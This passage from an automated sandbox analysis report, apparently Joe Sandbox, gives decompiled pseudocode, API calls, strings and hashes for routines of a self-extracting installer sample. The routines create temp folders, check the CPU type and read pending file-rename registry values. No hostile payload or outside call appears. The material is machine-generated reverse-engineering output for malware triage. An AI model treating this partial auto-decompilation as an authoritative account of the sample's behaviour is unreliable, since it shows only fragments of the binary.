                                                                        					E00F3171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E00F31680(_t32, 0x104, _t20);
                                                                        					E00F3658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E00F36CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0xf38a20 = 1;
                                                                        				goto L5;
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00F3171E: _vsnprintf.MSVCRT ref: 00F31750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F353FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1231568684
                                                                        • Opcode ID: 36ba9fc2ab00bf384b808ab713d420ed779282bf6471af8ead029b980d46f88d
                                                                        • Instruction ID: 8e49f893279f36dbc623c9404a303f9ca69e727fce39127a5cc24555be1de08c
                                                                        • Opcode Fuzzy Hash: 36ba9fc2ab00bf384b808ab713d420ed779282bf6471af8ead029b980d46f88d
                                                                        • Instruction Fuzzy Hash: C811E7B170060877D7289B369C49FEF766EEFC5731F000125F986D2290DE788946A6A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 f35467-f35484 479 f3548a-f35490 call f353a1 478->479 480 f3551c-f35528 call f31680 478->480 483 f35495-f35497 479->483 484 f3552d-f35539 call f358c8 480->484 485 f35581-f35583 483->485 486 f3549d-f354c0 call f31781 483->486 493 f3553b-f35545 CreateDirectoryA 484->493 494 f3554d-f35552 484->494 488 f3558d-f3559d call f36ce0 485->488 495 f354c2-f354d8 GetSystemInfo 486->495 496 f3550c-f3551a call f3658a 486->496 498 f35577-f3557c call f36285 493->498 499 f35547 493->499 500 f35585-f3558b 494->500 501 f35554-f35557 call f3597d 494->501 504 f354da-f354dd 495->504 505 f354fe 495->505 496->484 498->485 499->494 500->488 511 f3555c-f3555e 501->511 509 f354f7-f354fc 504->509 510 f354df-f354e2 504->510 512 f35503-f35507 call f3658a 505->512 509->512 513 f354f0-f354f5 510->513 514 f354e4-f354e7 510->514 511->500 515 f35560-f35566 511->515 512->496 513->512 514->496 517 f354e9-f354ee 514->517 515->485 518 f35568-f35575 RemoveDirectoryA 515->518 517->512 518->485
                                                                        C-Code - Quality: 75%
                                                                        			E00F35467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0xf391e4;
                                                                        					_t42 = 0x104;
                                                                        					E00F31680(0xf391e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E00F358C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0xf39124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E00F36CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E00F3597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0xf38a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0xf38a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0xf39124 = E00F36285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0xf38a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E00F353A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0xf391e4;
                                                                        				E00F31781(0xf391e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0xf39a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E00F3658A(_t48, 0x104, 0xf31140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E00F3658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}





















                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F354C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3556F
                                                                          • Part of subcall function 00F353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F353FB
                                                                          • Part of subcall function 00F353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35402
                                                                          • Part of subcall function 00F353A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3541F
                                                                          • Part of subcall function 00F353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3542B
                                                                          • Part of subcall function 00F353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-4535649
                                                                        • Opcode ID: 7f03e25f85b0b63b1eae187042d6ca14dd58b4610852eaa2f4b9296f9c7d4c6d
                                                                        • Instruction ID: 3ed59096674eeb78ab7a14ea52c63fa903b03ec721b413abd40f816d93241a38
                                                                        • Opcode Fuzzy Hash: 7f03e25f85b0b63b1eae187042d6ca14dd58b4610852eaa2f4b9296f9c7d4c6d
                                                                        • Instruction Fuzzy Hash: BA310871F00A046BCF54AF259C456BE779BBBC1B74F08012AE442D7240DBB8DE05B691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 f3256d-f3257d 520 f32583-f32589 519->520 521 f32622-f32627 call f324e0 519->521 523 f3258b 520->523 524 f325e8-f32607 RegOpenKeyExA 520->524 529 f32629-f3262f 521->529 528 f32591-f32595 523->528 523->529 525 f325e3-f325e6 524->525 526 f32609-f32620 RegQueryInfoKeyA 524->526 525->529 530 f325d1-f325dd RegCloseKey 526->530 528->529 531 f3259b-f325ba RegOpenKeyExA 528->531 530->525 531->525 532 f325bc-f325cb RegQueryValueExA 531->532 532->530
                                                                        C-Code - Quality: 86%
                                                                        			E00F3256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E00F324E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00F34096,00F34096,?,00F31ED3,00000001,00000000,?,?,00F34137,?), ref: 00F325B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F34096,?,00F31ED3,00000001,00000000,?,?,00F34137,?,00F34096), ref: 00F325CB
                                                                        • RegCloseKey.KERNELBASE(?,?,00F31ED3,00000001,00000000,?,?,00F34137,?,00F34096), ref: 00F325DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00F34096,00F34096,?,00F31ED3,00000001,00000000,?,?,00F34137,?), ref: 00F325FF
                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00F34096,00000000,00000000,00000000,00000000,?,00F31ED3,00000001,00000000), ref: 00F3261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00F325A8
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F325F5
                                                                        • PendingFileRenameOperations, xrefs: 00F325C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: a69f69c42e7c1e748b1ad38ef6a297c498b4fdef57b236ec8b323a9e50ff31a9
                                                                        • Instruction ID: d4c6ca512c67857df642781a9207db5d674aa95d28c01e1b7415723cbb3a20a1
                                                                        • Opcode Fuzzy Hash: a69f69c42e7c1e748b1ad38ef6a297c498b4fdef57b236ec8b323a9e50ff31a9
                                                                        • Instruction Fuzzy Hash: 97118CB5D02228BB9B64DB929C0ADFBBE7CEF117B1F144055B848A2100DB709F45F6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 533 f36a60-f36a91 call f37155 call f37208 GetStartupInfoW 539 f36a93-f36aa2 533->539 540 f36aa4-f36aa6 539->540 541 f36abc-f36abe 539->541 543 f36aa8-f36aad 540->543 544 f36aaf-f36aba Sleep 540->544 542 f36abf-f36ac5 541->542 545 f36ad1-f36ad7 542->545 546 f36ac7-f36acf _amsg_exit 542->546 543->542 544->539 548 f36b05 545->548 549 f36ad9-f36ae9 call f36c3f 545->549 547 f36b0b-f36b11 546->547 551 f36b13-f36b24 _initterm 547->551 552 f36b2e-f36b30 547->552 548->547 553 f36aee-f36af2 549->553 551->552 554 f36b32-f36b39 552->554 555 f36b3b-f36b42 552->555 553->547 556 f36af4-f36b00 553->556 554->555 557 f36b67-f36b71 555->557 558 f36b44-f36b51 call f37060 555->558 560 f36c39-f36c3e call f3724d 556->560 559 f36b74-f36b79 557->559 558->557 566 f36b53-f36b65 558->566 563 f36bc5-f36bc8 559->563 564 f36b7b-f36b7d 559->564 567 f36bd6-f36be3 _ismbblead 563->567 568 f36bca-f36bd3 563->568 569 f36b94-f36b98 564->569 570 f36b7f-f36b81 564->570 566->557 572 f36be5-f36be6 567->572 573 f36be9-f36bed 567->573 568->567 575 f36ba0-f36ba2 569->575 576 f36b9a-f36b9e 569->576 570->563 574 f36b83-f36b85 570->574 572->573 573->559 574->569 578 f36b87-f36b8a 574->578 579 f36ba3-f36bbc call f32bfb 575->579 576->579 578->569 581 f36b8c-f36b92 578->581 583 f36c1e-f36c25 579->583 584 f36bbe-f36bbf exit 579->584 581->574 585 f36c32 583->585 586 f36c27-f36c2d _cexit 583->586 584->563 585->560 586->585
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E00F37155();
                                                                        				_push(0x58);
                                                                        				_push(0xf372b8);
                                                                        				E00F37208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0xf388b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0xf388b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0xf381e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0xf388b0 = _t58;
                                                                        							_t37 = E00F36C3F(0xf310b8, 0xf310c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L00F36FF4();
                                                                        						L13:
                                                                        						_t68 =  *0xf388b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0xf310b4);
                                                                        							_push(0xf310ac);
                                                                        							L00F37202();
                                                                        							 *0xf388b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0xf388ac = 0;
                                                                        						}
                                                                        						_t71 =  *0xf388b4;
                                                                        						if( *0xf388b4 != 0 && E00F37060(_t71, 0xf388b4) != 0) {
                                                                        							_t60 =  *0xf388b4; // 0x0
                                                                        							 *0xf3a288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E00F32BFB(0xf30000, 0, _t59); // executed
                                                                        							 *0xf381e0 = _t30;
                                                                        							__eflags =  *0xf381f8;
                                                                        							if( *0xf381f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0xf381e4;
                                                                        							if( *0xf381e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0xf381e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E00F3724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00F37155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F37182
                                                                          • Part of subcall function 00F37155: GetCurrentProcessId.KERNEL32 ref: 00F37191
                                                                          • Part of subcall function 00F37155: GetCurrentThreadId.KERNEL32 ref: 00F3719A
                                                                          • Part of subcall function 00F37155: GetTickCount.KERNEL32 ref: 00F371A3
                                                                          • Part of subcall function 00F37155: QueryPerformanceCounter.KERNEL32(?), ref: 00F371B8
                                                                        • GetStartupInfoW.KERNEL32(?,00F372B8,00000058), ref: 00F36A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00F36AB4
                                                                        • _amsg_exit.MSVCRT ref: 00F36AC9
                                                                        • _initterm.MSVCRT ref: 00F36B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F36B49
                                                                        • exit.KERNELBASE ref: 00F36BBF
                                                                        • _ismbblead.MSVCRT ref: 00F36BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 147df4b3bb82d547ba7432e5c0247cc0cb8bfce553d47526182dba69938d38d0
                                                                        • Instruction ID: 01a0cf62179697f87c2ed5ea5047708616ee9071bfda85cfd6205bb8d24ff13b
                                                                        • Opcode Fuzzy Hash: 147df4b3bb82d547ba7432e5c0247cc0cb8bfce553d47526182dba69938d38d0
                                                                        • Instruction Fuzzy Hash: 8041D571D48328EBDB21AB68DC0576AB7E5FB84771F24811AF841E7290CB788942BF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 f358c8-f358d5 588 f358d8-f358dd 587->588 588->588 589 f358df-f358f1 LocalAlloc 588->589 590 f358f3-f35901 call f344b9 589->590 591 f35919-f35959 call f31680 call f3658a CreateFileA LocalFree 589->591 594 f35906-f35910 call f36285 590->594 591->594 601 f3595b-f3596c CloseHandle GetFileAttributesA 591->601 600 f35912-f35918 594->600 601->594 602 f3596e-f35970 601->602 602->594 603 f35972-f3597b 602->603 603->600
                                                                        C-Code - Quality: 95%
                                                                        			E00F358C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E00F31680(_t20, _t36, _t33);
                                                                        					E00F3658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0xf39124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0xf39124 = E00F36285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F358E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35943
                                                                        • LocalFree.KERNEL32(00000000,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3594D
                                                                        • CloseHandle.KERNEL32(00000000,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35963
                                                                        Strings
                                                                        Memory Dump Source
